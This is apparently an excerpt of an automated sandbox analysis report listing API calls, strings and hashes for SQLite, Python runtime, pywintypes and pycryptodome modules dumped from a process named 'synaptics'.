                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3858028811-0
                                                                                                                                                                                                              • Opcode ID: 602dcc008cc506e24a54e1af453f69ae952407c6b4325f4f89e32d598709ab7f
                                                                                                                                                                                                              • Instruction ID: 82743452cbd1ae4691e1d7f894db85663a385534d8e8e41bc281ec0d97e8143c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 602dcc008cc506e24a54e1af453f69ae952407c6b4325f4f89e32d598709ab7f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEF0BEB0F622006AFB106FB1DD6ABA836B0378270EF015742B40051682EFB03188AB86

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1677 6c0c4730-6c0c4748 realloc 1678 6c0c474a-6c0c4769 _msize sqlite3_log 1677->1678 1679 6c0c476b-6c0c476e 1677->1679 1678->1679
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 6C0C473B
                                                                                                                                                                                                              • _msize.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 6C0C4750
                                                                                                                                                                                                              • sqlite3_log.SQLITE3(00000007,failed memory resize %u to %u bytes,00000000), ref: 6C0C4761
                                                                                                                                                                                                                • Part of subcall function 6C0C84F0: sqlite3_str_vappendf.SQLITE3(?,?,?), ref: 6C0C8551
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • failed memory resize %u to %u bytes, xrefs: 6C0C475A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _msizereallocsqlite3_logsqlite3_str_vappendf
                                                                                                                                                                                                              • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                              • API String ID: 2551694414-2134078882
                                                                                                                                                                                                              • Opcode ID: 39f3cc62f472628b9e85960b93afa6545dfc42b6c2b1fb426d9e38aeda5d2162
                                                                                                                                                                                                              • Instruction ID: 24d11a1c46c59a90f8e8bd46b2d850536ba6185d1bde32a32fee6c64bcd41f00
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39f3cc62f472628b9e85960b93afa6545dfc42b6c2b1fb426d9e38aeda5d2162
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DE08636A441147BDF012B95DC09DDE3F69DB022BAF044124FD0C55711E73AEA3497D6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __p___wargv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA1001
                                                                                                                                                                                                              • __p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CA1009
                                                                                                                                                                                                              • Py_Main.PYTHON310(00000000), ref: 00CA1012
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3050932520.0000000000CA1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00CA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3050409036.0000000000CA0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3051382281.0000000000CA2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3051982684.0000000000CA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_ca0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Main__p___argc__p___wargv
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3246942480-0
                                                                                                                                                                                                              • Opcode ID: 7f3e59060ea74da679d98685cc4f128b7209c7cab976c3509d1a47bad73e5acb
                                                                                                                                                                                                              • Instruction ID: cb1b6dced9289d0b2ef30a7a0b7b2d5fc87bd627a752cdc69a44ec170122fd45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f3e59060ea74da679d98685cc4f128b7209c7cab976c3509d1a47bad73e5acb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DC04C724010349FC6016B68FC0CB8E3F65FF0731A7050451F90697531CF211965DBA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?,?,00000002,?), ref: 6C0C52A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2313487548-0
                                                                                                                                                                                                              • Opcode ID: 77845572fec8aa29f9acddebf54cabe0fa0880cec1f3b2cef7485c936045fa63
                                                                                                                                                                                                              • Instruction ID: 316883ba9b8d447b7dd858783a1b3d58da7afa2c08cf8c9fe0205d9450e8d239
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 77845572fec8aa29f9acddebf54cabe0fa0880cec1f3b2cef7485c936045fa63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C64106B9B071089BDF008EADA855A5DB7F5EB47259B04417AE819C3700DB70E901BB93
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memmove.VCRUNTIME140(00000000,?,00000080,?,6C1C17A0,?,?,6C0C74FE,00000001,?), ref: 6C0C563E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memmove
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2162964266-0
                                                                                                                                                                                                              • Opcode ID: c892140ddf50f237b9c6712488be1dffc7dca26b42804a862db6e6e26370b109
                                                                                                                                                                                                              • Instruction ID: 7069451c71007d3d91f5790d447694c5d8258f06a7d1d665d0b582542b776519
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c892140ddf50f237b9c6712488be1dffc7dca26b42804a862db6e6e26370b109
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A411E53E3086046ADB1105A9AC407DFB3DEDBC0379F54413BE90987650EA72AD096393
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_initialize.SQLITE3 ref: 6C16BD10
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000), ref: 6C16BD44
                                                                                                                                                                                                              • sqlite3_initialize.SQLITE3 ref: 6C16BD4C
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000), ref: 6C16BD80
                                                                                                                                                                                                              • sqlite3_mprintf.SQLITE3(6C1C24D0,?), ref: 6C16BE98
                                                                                                                                                                                                              • sqlite3_free.SQLITE3(?), ref: 6C16C6F7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0c0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memsetsqlite3_initialize$sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                              • String ID: %Q, $%z%Q, $, ?$,%s(?)$4$CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)$PRAGMA %Q.page_size$__langid$asc$compress$desc$error parsing prefix parameter: %s$fts3$matchinfo$missing %s parameter in fts4 constructor$no such column: %s$simple$tokenize$uncompress$unrecognized matchinfo: %s$unrecognized order: %s$unrecognized parameter: %s
                                                                                                                                                                                                              • API String ID: 1762315407-694293377
                                                                                                                                                                                                              • Opcode ID: 2ca19a813bc33267d0dfae724eb888f74000b520da4d50010b775b01159a5d46
                                                                                                                                                                                                              • Instruction ID: b475c4bcf7b8fc3ccd31db7731b5384343471876ab9e0cf92146f20c2cfb8f9e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ca19a813bc33267d0dfae724eb888f74000b520da4d50010b775b01159a5d46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03F2F2B16063418FDB00DF2AC4A475ABBF0BF96308F14496EF89587B01D735E966CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(?,6C0B6934,?,?,?,?), ref: 6C0ADC9D
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0ADCC0
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(?,6C0B6B98,?), ref: 6C0ADCDF
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0ADCF9
                                                                                                                                                                                                              • _PyObject_LookupAttrId.PYTHON310(?,6C0B6BA8,?), ref: 6C0ADD13
                                                                                                                                                                                                              • _PyLong_AsInt.PYTHON310(?), ref: 6C0ADD2F
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0ADD46
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0ADD4F
                                                                                                                                                                                                              • PyErr_ExceptionMatches.PYTHON310(6C7E9584), ref: 6C0ADD66
                                                                                                                                                                                                              • PyErr_ExceptionMatches.PYTHON310(6C7E9D44), ref: 6C0ADD76
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9C54,_pack_ must be a non-negative integer), ref: 6C0ADD8F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$AttrDeallocLookupObject_$ExceptionMatches$Long_OccurredString
                                                                                                                                                                                                              • String ID: %s:%s:$'_fields_' must be a sequence of (name, C type) pairs$'_fields_' must be a sequence of pairs$04Ul$0bal$Structure or union cannot contain itself$UO|i$_fields_ is final$_pack_ must be a non-negative integer$bit fields not allowed for type %s$ctypes state is not initialized$number of bits invalid for bit field$second item in _fields_ tuple (index %zd) must be a C type
                                                                                                                                                                                                              • API String ID: 1955056537-4212398402
                                                                                                                                                                                                              • Opcode ID: d1506cf35329e7ebd15af3833e8a27c4c94b51d3d5d901b96a33d5d608b28c22
                                                                                                                                                                                                              • Instruction ID: efbbb38c06d8f5f65c5511770d15b6f87b8c01a5dcd5dabe95c1b45792a9c879
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1506cf35329e7ebd15af3833e8a27c4c94b51d3d5d901b96a33d5d608b28c22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FA28071E042099FDB00CFE8D884BDEB7F5BF45318F144269E829A7752DB32A956CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.VCRUNTIME140 ref: 6BF822D6
                                                                                                                                                                                                              • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000008), ref: 6BF82385
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82C89
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82C95
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82CA1
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF82CAD
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82CB9
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82CC3
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82CD4
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82CE7
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82CFB
                                                                                                                                                                                                              • _aligned_free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF82D0B
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82D1B
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82D25
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF82D2B
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82D34
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF82D3D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082736553.000000006BF89000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf80000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$_aligned_freecallocmemset
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 618082469-2766056989
                                                                                                                                                                                                              • Opcode ID: 69b91200361fb2320079752ad163c26d2e1b47915302d3ac8d89c5ec25c2bb2c
                                                                                                                                                                                                              • Instruction ID: 3c0c8d41e60d643bcb7bfce1dcdc6f1b9c516a8af435336d8515fd2012aa7d57
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69b91200361fb2320079752ad163c26d2e1b47915302d3ac8d89c5ec25c2bb2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F725E726047029FDB11CF68C980A1BBBF2FF89704F04492DF59A97221D736E919DB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(AdvAPI32.dll), ref: 6BF4B6C6
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(AdvAPI32.dll), ref: 6BF4B6D7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddAccessAllowedAce), ref: 6BF4B6F4
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddAccessDeniedAce), ref: 6BF4B70D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddAccessAllowedAceEx), ref: 6BF4B726
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddMandatoryAce), ref: 6BF4B73F
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddAccessAllowedObjectAce), ref: 6BF4B758
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddAccessDeniedAceEx), ref: 6BF4B771
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddAccessDeniedObjectAce), ref: 6BF4B78A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddAuditAccessAceEx), ref: 6BF4B7A3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,AddAuditAccessObjectAce), ref: 6BF4B7BC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetSecurityDescriptorControl), ref: 6BF4B7D5
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(6BF5A71C), ref: 6BF4B7FD
                                                                                                                                                                                                              • TlsAlloc.KERNEL32 ref: 6BF4B803
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(6BF5A71C), ref: 6BF4B81B
                                                                                                                                                                                                              • TlsFree.KERNEL32 ref: 6BF4B827
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$CriticalSection$AllocDeleteFreeHandleInitializeLibraryLoadModule
                                                                                                                                                                                                              • String ID: AddAccessAllowedAce$AddAccessAllowedAceEx$AddAccessAllowedObjectAce$AddAccessDeniedAce$AddAccessDeniedAceEx$AddAccessDeniedObjectAce$AddAuditAccessAceEx$AddAuditAccessObjectAce$AddMandatoryAce$AdvAPI32.dll$SetSecurityDescriptorControl
                                                                                                                                                                                                              • API String ID: 3842108915-2689366622
                                                                                                                                                                                                              • Opcode ID: eae735209490a19729a523cda8260b90aac5e9f2a1f7ebbf48c855aabc64b295
                                                                                                                                                                                                              • Instruction ID: 86d6f5dff21e6517719a707ca750441066977a0818300b85065c0d02a4e88ba1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: eae735209490a19729a523cda8260b90aac5e9f2a1f7ebbf48c855aabc64b295
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C31C077720201AFEF189F399C64B397BE9EBB6641701543EA915C2271DA79CC248F70
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310 ref: 6BF47616
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF47629
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,s#:SID,?,?), ref: 6BF4763B
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF47648
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,(bbbbbb)O:SID,?,?,?,?,?,?,?), ref: 6BF47673
                                                                                                                                                                                                              • PySequence_Check.PYTHON310(?), ref: 6BF47680
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,sub authorities must be a sequence of integers.), ref: 6BF47699
                                                                                                                                                                                                              • PySequence_Size.PYTHON310(?), ref: 6BF476BA
                                                                                                                                                                                                              • PySequence_Tuple.PYTHON310(?), ref: 6BF476D5
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(00000000,|llllllll:SID,?,?,?,?,?,?,?,?), ref: 6BF47712
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF4771F
                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 6BF4775B
                                                                                                                                                                                                              • ??0PySID@@QAE@PAX@Z.PYWINTYPES310(?), ref: 6BF47799
                                                                                                                                                                                                                • Part of subcall function 6BF47C10: _Py_NewReference.PYTHON310(00000000,?,?,6BF46CF8), ref: 6BF47C1C
                                                                                                                                                                                                                • Part of subcall function 6BF47C10: GetLengthSid.ADVAPI32(?), ref: 6BF47C29
                                                                                                                                                                                                                • Part of subcall function 6BF47C10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF47C32
                                                                                                                                                                                                                • Part of subcall function 6BF47C10: CopySid.ADVAPI32(00000000,00000000,?), ref: 6BF47C44
                                                                                                                                                                                                              • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES310(AllocateAndInitializeSid,00000000), ref: 6BF4776B
                                                                                                                                                                                                                • Part of subcall function 6BF4BDF7: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,6BF42282,0000000C), ref: 6BF4BE0C
                                                                                                                                                                                                              • _Py_NewReference.PYTHON310(00000000,0000000C), ref: 6BF477CD
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF477D4
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,?,?), ref: 6BF477E7
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BF477F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Size$Arg_ParseTuple_$Err_Sequence_malloc$ClearReference$AllocateCheckCopyDeallocError@@InitializeLengthStringTupleU_object@@Win_memcpymemset
                                                                                                                                                                                                              • String ID: $(bbbbbb)O:SID$AllocateAndInitializeSid$s#:SID$sub authorities must be a sequence of integers.$sub authorities sequence size must be <= 8$|llllllll:SID$|n:SID
                                                                                                                                                                                                              • API String ID: 1863285290-567476437
                                                                                                                                                                                                              • Opcode ID: 62865412da73f514dfead1f3198b904aea3637d3453ccbb5be3f7c17ba503f7a
                                                                                                                                                                                                              • Instruction ID: 002fa09ad0e4a80644757c422f1818e5cd3de46d753b015577deffd885dc253f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62865412da73f514dfead1f3198b904aea3637d3453ccbb5be3f7c17ba503f7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2516273514211AFD701DBA4CC41D9FBBEDEF89354F40492AF695C2122EB39D9188BA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF858C0: memset.VCRUNTIME140(00000000,00000000,4F1A1DF9,?,?,?,00000000,?,?,6BF82461,?,?), ref: 6BF8590B
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000), ref: 6BF86005
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0(1 & a,D:\a\pycryptodome\pycryptodome\src\mont.c,0000005B), ref: 6BF861BC
                                                                                                                                                                                                              • _wassert.API-MS-WIN-CRT-RUNTIME-L1-1-0((x*a & 0xFFFFFFFFFFFFFFFFULL) == 1,D:\a\pycryptodome\pycryptodome\src\mont.c,00000061,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00000000,00000000,00000002), ref: 6BF862A1
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6BF862B8
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6BF86327
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BF8634C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86354
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8635C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86364
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF8636C
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF86374
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6BF8637A
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000000,?,00000000), ref: 6BF863A6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • 1 & a, xrefs: 6BF861B7
                                                                                                                                                                                                              • (x*a & 0xFFFFFFFFFFFFFFFFULL) == 1, xrefs: 6BF8629C
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF861B2
                                                                                                                                                                                                              • D:\a\pycryptodome\pycryptodome\src\mont.c, xrefs: 6BF86297
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3082077383.000000006BF81000.00000020.00000001.01000000.00000034.sdmp, Offset: 6BF80000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3081877305.000000006BF80000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082332200.000000006BF87000.00000002.00000001.01000000.00000034.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3082540453.000000006BF88000.00000004.00000001.01000000.00000034.sdmpDownload File
